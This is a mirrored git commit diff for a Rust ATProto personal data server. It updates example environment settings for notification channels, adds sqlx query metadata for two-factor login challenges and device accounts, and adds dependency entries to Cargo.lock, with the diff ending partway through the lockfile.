mirror of
https://tangled.org/tranquil.farm/tranquil-pds
synced 2026-02-08 21:30:08 +00:00
Remaining endpoints for MVP
This commit is contained in:
17
.env.example
17
.env.example
@@ -13,26 +13,27 @@ AWS_SECRET_ACCESS_KEY=minioadmin
|
||||
PDS_HOSTNAME=localhost:3000
|
||||
PLC_URL=plc.directory
|
||||
|
||||
# A comma-separated list of WebSocket URLs for firehose relays to push updates to.
|
||||
# e.g., RELAYS=wss://relay.bsky.social,wss://another-relay.com
|
||||
RELAYS=
|
||||
# A comma-separated list of relay URLs to notify via requestCrawl when we have updates.
|
||||
# e.g., CRAWLERS=https://bsky.network
|
||||
CRAWLERS=
|
||||
|
||||
# Notification Service Configuration
|
||||
# At least one notification channel should be configured for user notifications to work.
|
||||
|
||||
# Email notifications (via sendmail/msmtp)
|
||||
# MAIL_FROM_ADDRESS=noreply@example.com
|
||||
# MAIL_FROM_NAME=My PDS
|
||||
# SENDMAIL_PATH=/usr/sbin/sendmail
|
||||
|
||||
# Discord notifications (not yet implemented)
|
||||
# DISCORD_BOT_TOKEN=your-bot-token
|
||||
# Discord notifications (via webhook)
|
||||
# DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/...
|
||||
|
||||
# Telegram notifications (not yet implemented)
|
||||
# Telegram notifications (via bot)
|
||||
# TELEGRAM_BOT_TOKEN=your-bot-token
|
||||
|
||||
# Signal notifications (not yet implemented)
|
||||
# Signal notifications (via signal-cli)
|
||||
# SIGNAL_CLI_PATH=/usr/local/bin/signal-cli
|
||||
# SIGNAL_PHONE_NUMBER=+1234567890
|
||||
# SIGNAL_SENDER_NUMBER=+1234567890
|
||||
|
||||
CARGO_MOMMYS_LITTLE=mister
|
||||
CARGO_MOMMYS_PRONOUNS=his
|
||||
|
||||
34
.sqlx/query-0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e.json
generated
Normal file
34
.sqlx/query-0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e.json
generated
Normal file
@@ -0,0 +1,34 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT preferred_notification_channel as \"channel: NotificationChannel\" FROM users WHERE did = $1",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "channel: NotificationChannel",
|
||||
"type_info": {
|
||||
"Custom": {
|
||||
"name": "notification_channel",
|
||||
"kind": {
|
||||
"Enum": [
|
||||
"email",
|
||||
"discord",
|
||||
"telegram",
|
||||
"signal"
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e"
|
||||
}
|
||||
61
.sqlx/query-0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f.json
generated
Normal file
61
.sqlx/query-0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f.json
generated
Normal file
@@ -0,0 +1,61 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)\n VALUES ($1, $2, $3, $4)\n RETURNING id, did, request_uri, code, attempts, created_at, expires_at\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "id",
|
||||
"type_info": "Uuid"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "did",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 2,
|
||||
"name": "request_uri",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 3,
|
||||
"name": "code",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 4,
|
||||
"name": "attempts",
|
||||
"type_info": "Int4"
|
||||
},
|
||||
{
|
||||
"ordinal": 5,
|
||||
"name": "created_at",
|
||||
"type_info": "Timestamptz"
|
||||
},
|
||||
{
|
||||
"ordinal": 6,
|
||||
"name": "expires_at",
|
||||
"type_info": "Timestamptz"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text",
|
||||
"Text",
|
||||
"Text",
|
||||
"Timestamptz"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f"
|
||||
}
|
||||
22
.sqlx/query-180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09.json
generated
Normal file
22
.sqlx/query-180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09.json
generated
Normal file
@@ -0,0 +1,22 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n SELECT two_factor_enabled\n FROM users\n WHERE did = $1\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "two_factor_enabled",
|
||||
"type_info": "Bool"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09"
|
||||
}
|
||||
@@ -1,30 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "rkey",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "record_cid",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid",
|
||||
"Text",
|
||||
"Int8"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1"
|
||||
}
|
||||
@@ -1,30 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "rkey",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "record_cid",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid",
|
||||
"Text",
|
||||
"Int8"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c"
|
||||
}
|
||||
@@ -36,7 +36,8 @@
|
||||
"email_update",
|
||||
"account_deletion",
|
||||
"admin_email",
|
||||
"plc_operation"
|
||||
"plc_operation",
|
||||
"two_factor_code"
|
||||
]
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,31 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "rkey",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "record_cid",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid",
|
||||
"Text",
|
||||
"Text",
|
||||
"Int8"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e"
|
||||
}
|
||||
@@ -1,31 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "rkey",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "record_cid",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid",
|
||||
"Text",
|
||||
"Text",
|
||||
"Int8"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15"
|
||||
}
|
||||
76
.sqlx/query-458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810.json
generated
Normal file
76
.sqlx/query-458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810.json
generated
Normal file
@@ -0,0 +1,76 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n SELECT id, did, email, password_hash, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\",\n deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "id",
|
||||
"type_info": "Uuid"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "did",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 2,
|
||||
"name": "email",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 3,
|
||||
"name": "password_hash",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 4,
|
||||
"name": "two_factor_enabled",
|
||||
"type_info": "Bool"
|
||||
},
|
||||
{
|
||||
"ordinal": 5,
|
||||
"name": "preferred_notification_channel: NotificationChannel",
|
||||
"type_info": {
|
||||
"Custom": {
|
||||
"name": "notification_channel",
|
||||
"kind": {
|
||||
"Enum": [
|
||||
"email",
|
||||
"discord",
|
||||
"telegram",
|
||||
"signal"
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
{
|
||||
"ordinal": 6,
|
||||
"name": "deactivated_at",
|
||||
"type_info": "Timestamptz"
|
||||
},
|
||||
{
|
||||
"ordinal": 7,
|
||||
"name": "takedown_ref",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
true,
|
||||
true
|
||||
]
|
||||
},
|
||||
"hash": "458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810"
|
||||
}
|
||||
22
.sqlx/query-4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6.json
generated
Normal file
22
.sqlx/query-4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6.json
generated
Normal file
@@ -0,0 +1,22 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n UPDATE oauth_2fa_challenge\n SET attempts = attempts + 1\n WHERE id = $1\n RETURNING attempts\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "attempts",
|
||||
"type_info": "Int4"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6"
|
||||
}
|
||||
@@ -36,7 +36,8 @@
|
||||
"email_update",
|
||||
"account_deletion",
|
||||
"admin_email",
|
||||
"plc_operation"
|
||||
"plc_operation",
|
||||
"two_factor_code"
|
||||
]
|
||||
}
|
||||
}
|
||||
|
||||
46
.sqlx/query-62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f.json
generated
Normal file
46
.sqlx/query-62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f.json
generated
Normal file
@@ -0,0 +1,46 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n SELECT id, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\"\n FROM users\n WHERE did = $1\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "id",
|
||||
"type_info": "Uuid"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "two_factor_enabled",
|
||||
"type_info": "Bool"
|
||||
},
|
||||
{
|
||||
"ordinal": 2,
|
||||
"name": "preferred_notification_channel: NotificationChannel",
|
||||
"type_info": {
|
||||
"Custom": {
|
||||
"name": "notification_channel",
|
||||
"kind": {
|
||||
"Enum": [
|
||||
"email",
|
||||
"discord",
|
||||
"telegram",
|
||||
"signal"
|
||||
]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f"
|
||||
}
|
||||
14
.sqlx/query-6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4.json
generated
Normal file
14
.sqlx/query-6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4.json
generated
Normal file
@@ -0,0 +1,14 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n DELETE FROM oauth_2fa_challenge WHERE request_uri = $1\n ",
|
||||
"describe": {
|
||||
"columns": [],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": []
|
||||
},
|
||||
"hash": "6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4"
|
||||
}
|
||||
14
.sqlx/query-7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5.json
generated
Normal file
14
.sqlx/query-7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5.json
generated
Normal file
@@ -0,0 +1,14 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n DELETE FROM oauth_2fa_challenge WHERE id = $1\n ",
|
||||
"describe": {
|
||||
"columns": [],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid"
|
||||
]
|
||||
},
|
||||
"nullable": []
|
||||
},
|
||||
"hash": "7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5"
|
||||
}
|
||||
40
.sqlx/query-841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb.json
generated
Normal file
40
.sqlx/query-841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb.json
generated
Normal file
@@ -0,0 +1,40 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ORDER BY ad.updated_at DESC\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "did",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "handle",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 2,
|
||||
"name": "email",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 3,
|
||||
"name": "last_used_at",
|
||||
"type_info": "Timestamptz"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb"
|
||||
}
|
||||
58
.sqlx/query-881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708.json
generated
Normal file
58
.sqlx/query-881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708.json
generated
Normal file
@@ -0,0 +1,58 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n SELECT id, did, request_uri, code, attempts, created_at, expires_at\n FROM oauth_2fa_challenge\n WHERE request_uri = $1\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "id",
|
||||
"type_info": "Uuid"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "did",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 2,
|
||||
"name": "request_uri",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 3,
|
||||
"name": "code",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 4,
|
||||
"name": "attempts",
|
||||
"type_info": "Int4"
|
||||
},
|
||||
{
|
||||
"ordinal": 5,
|
||||
"name": "created_at",
|
||||
"type_info": "Timestamptz"
|
||||
},
|
||||
{
|
||||
"ordinal": 6,
|
||||
"name": "expires_at",
|
||||
"type_info": "Timestamptz"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708"
|
||||
}
|
||||
@@ -1,40 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n SELECT did, password_hash, deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "did",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "password_hash",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 2,
|
||||
"name": "deactivated_at",
|
||||
"type_info": "Timestamptz"
|
||||
},
|
||||
{
|
||||
"ordinal": 3,
|
||||
"name": "takedown_ref",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false,
|
||||
true,
|
||||
true
|
||||
]
|
||||
},
|
||||
"hash": "91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43"
|
||||
}
|
||||
23
.sqlx/query-a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b.json
generated
Normal file
23
.sqlx/query-a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b.json
generated
Normal file
@@ -0,0 +1,23 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n SELECT 1 as exists\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND ad.did = $2\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "exists",
|
||||
"type_info": "Int4"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text",
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
null
|
||||
]
|
||||
},
|
||||
"hash": "a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b"
|
||||
}
|
||||
12
.sqlx/query-bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac.json
generated
Normal file
12
.sqlx/query-bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac.json
generated
Normal file
@@ -0,0 +1,12 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()\n ",
|
||||
"describe": {
|
||||
"columns": [],
|
||||
"parameters": {
|
||||
"Left": []
|
||||
},
|
||||
"nullable": []
|
||||
},
|
||||
"hash": "bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac"
|
||||
}
|
||||
@@ -44,7 +44,8 @@
|
||||
"email_update",
|
||||
"account_deletion",
|
||||
"admin_email",
|
||||
"plc_operation"
|
||||
"plc_operation",
|
||||
"two_factor_code"
|
||||
]
|
||||
}
|
||||
}
|
||||
|
||||
207
Cargo.lock
generated
207
Cargo.lock
generated
@@ -915,8 +915,10 @@ dependencies = [
|
||||
"dotenvy",
|
||||
"ed25519-dalek",
|
||||
"futures",
|
||||
"governor",
|
||||
"hkdf",
|
||||
"hmac",
|
||||
"image",
|
||||
"ipld-core",
|
||||
"iroh-car",
|
||||
"jacquard",
|
||||
@@ -985,12 +987,24 @@ version = "0.6.9"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e"
|
||||
|
||||
[[package]]
|
||||
name = "bytemuck"
|
||||
version = "1.24.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "1fbdf580320f38b612e485521afda1ee26d10cc9884efaaa750d383e13e3c5f4"
|
||||
|
||||
[[package]]
|
||||
name = "byteorder"
|
||||
version = "1.5.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
|
||||
|
||||
[[package]]
|
||||
name = "byteorder-lite"
|
||||
version = "0.1.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "8f1fe948ff07f4bd06c30984e69f5b4899c516a3ef74f34df92a2df2ab535495"
|
||||
|
||||
[[package]]
|
||||
name = "bytes"
|
||||
version = "1.11.0"
|
||||
@@ -1157,6 +1171,12 @@ dependencies = [
|
||||
"cc",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "color_quant"
|
||||
version = "1.1.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "3d7b894f5411737b7867f4827955924d7c254fc9f4d91a6aad6b097804b1018b"
|
||||
|
||||
[[package]]
|
||||
name = "compression-codecs"
|
||||
version = "0.4.33"
|
||||
@@ -1819,6 +1839,15 @@ version = "2.3.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be"
|
||||
|
||||
[[package]]
|
||||
name = "fdeflate"
|
||||
version = "0.3.7"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "1e6853b52649d4ac5c0bd02320cddc5ba956bdb407c4b75a2c6b75bf51500f8c"
|
||||
dependencies = [
|
||||
"simd-adler32",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "ferroid"
|
||||
version = "0.8.7"
|
||||
@@ -1907,6 +1936,12 @@ version = "0.1.5"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
|
||||
|
||||
[[package]]
|
||||
name = "foldhash"
|
||||
version = "0.2.0"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb"
|
||||
|
||||
[[package]]
|
||||
name = "foreign-types"
|
||||
version = "0.3.2"
|
||||
@@ -2055,6 +2090,12 @@ version = "0.3.31"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988"
|
||||
|
||||
[[package]]
|
||||
name = "futures-timer"
|
||||
version = "3.0.3"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "f288b0a4f20f9a56b5d1da57e2227c661b7b16168e2f72365f57b63326e29b24"
|
||||
|
||||
[[package]]
|
||||
name = "futures-util"
|
||||
version = "0.3.31"
|
||||
@@ -2135,6 +2176,16 @@ dependencies = [
|
||||
"polyval",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "gif"
|
||||
version = "0.14.1"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "f5df2ba84018d80c213569363bdcd0c64e6933c67fe4c1d60ecf822971a3c35e"
|
||||
dependencies = [
|
||||
"color_quant",
|
||||
"weezl",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "glob"
|
||||
version = "0.3.3"
|
||||
@@ -2169,6 +2220,29 @@ dependencies = [
|
||||
"web-sys",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "governor"
|
||||
version = "0.10.2"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "6e23d5986fd4364c2fb7498523540618b4b8d92eec6c36a02e565f66748e2f79"
|
||||
dependencies = [
|
||||
"cfg-if",
|
||||
"dashmap 6.1.0",
|
||||
"futures-sink",
|
||||
"futures-timer",
|
||||
"futures-util",
|
||||
"getrandom 0.3.4",
|
||||
"hashbrown 0.16.1",
|
||||
"nonzero_ext",
|
||||
"parking_lot",
|
||||
"portable-atomic",
|
||||
"quanta",
|
||||
"rand 0.9.2",
|
||||
"smallvec",
|
||||
"spinning_top",
|
||||
"web-time",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "group"
|
||||
version = "0.12.1"
|
||||
@@ -2260,7 +2334,7 @@ checksum = "9229cfe53dfd69f0609a49f65461bd93001ea1ef889cd5529dd176593f5338a1"
|
||||
dependencies = [
|
||||
"allocator-api2",
|
||||
"equivalent",
|
||||
"foldhash",
|
||||
"foldhash 0.1.5",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
@@ -2268,6 +2342,11 @@ name = "hashbrown"
|
||||
version = "0.16.1"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100"
|
||||
dependencies = [
|
||||
"allocator-api2",
|
||||
"equivalent",
|
||||
"foldhash 0.2.0",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "hashlink"
|
||||
@@ -2759,6 +2838,34 @@ dependencies = [
|
||||
"icu_properties",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "image"
|
||||
version = "0.25.9"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "e6506c6c10786659413faa717ceebcb8f70731c0a60cbae39795fdf114519c1a"
|
||||
dependencies = [
|
||||
"bytemuck",
|
||||
"byteorder-lite",
|
||||
"color_quant",
|
||||
"gif",
|
||||
"image-webp",
|
||||
"moxcms",
|
||||
"num-traits",
|
||||
"png",
|
||||
"zune-core",
|
||||
"zune-jpeg",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "image-webp"
|
||||
version = "0.2.4"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "525e9ff3e1a4be2fbea1fdf0e98686a6d98b4d8f937e1bf7402245af1909e8c3"
|
||||
dependencies = [
|
||||
"byteorder-lite",
|
||||
"quick-error",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "indexmap"
|
||||
version = "1.9.3"
|
||||
@@ -3476,6 +3583,16 @@ dependencies = [
|
||||
"windows-sys 0.61.2",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "moxcms"
|
||||
version = "0.7.10"
|
||||
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||
checksum = "80986bbbcf925ebd3be54c26613d861255284584501595cf418320c078945608"
|
||||
dependencies = [
|
||||
"num-traits",
|
||||
"pxfm",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "multibase"
|
||||
version = "0.9.2"
|
||||
@@ -3553,6 +3670,12 @@ dependencies = [
|
||||
"minimal-lexical",
|
||||
]
|
||||
|
||||
[[package]]
|
||||
name = "nonzero_ext"
|
||||
version = "0.3.0"
|
||||
